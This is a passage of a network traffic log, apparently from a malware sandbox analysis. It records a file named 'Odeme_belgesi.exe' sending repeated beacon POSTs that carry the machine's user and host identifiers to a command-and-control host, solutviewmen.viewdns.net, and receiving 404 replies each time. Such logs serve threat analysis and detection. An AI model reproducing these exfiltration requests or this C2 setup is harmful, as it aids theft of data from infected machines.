Oct 1, 2024 10:55:33.281197071 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:33.286077976 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:33.949079990 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49768	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:34.113163948 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:34.118880987 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:34.773499012 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49769	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:34.928299904 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:34.933166027 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:35.684986115 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49770	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:35.834328890 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:35.839128017 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:36.536109924 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49771	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:36.701838970 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:36.706650972 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:37.350745916 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49772	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:37.519464970 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:37.524415970 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:38.216752052 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49773	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:38.369221926 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:38.374177933 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:39.220180988 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49774	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:39.380389929 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:39.385441065 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:40.152374029 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49775	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:40.323199034 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:40.328120947 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:41.021992922 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49776	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:41.376389980 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:41.381303072 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:42.240808964 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49777	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:42.415899038 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:42.421720982 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:43.424582958 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49778	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:43.584779978 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:43.589678049 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:47.272047043 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49779	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:47.459558010 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:47.464643955 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:48.112679958 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49780	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:48.287878990 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:48.292928934 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:48.953130007 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49781	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:49.343225956 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:49.348505974 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:50.175956964 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49782	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:50.338696003 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:50.343657017 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:50.990062952 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49783	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:51.139950991 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:51.144817114 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:51.897425890 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49784	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:52.151492119 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:52.156455994 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:53.034257889 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49786	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:53.188088894 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:53.192941904 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:53.833734035 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49787	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:53.983777046 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:53.988610983 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:54.638890028 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49788	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:54.952989101 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:54.958719969 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:55.642245054 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49789	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:55.788645983 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
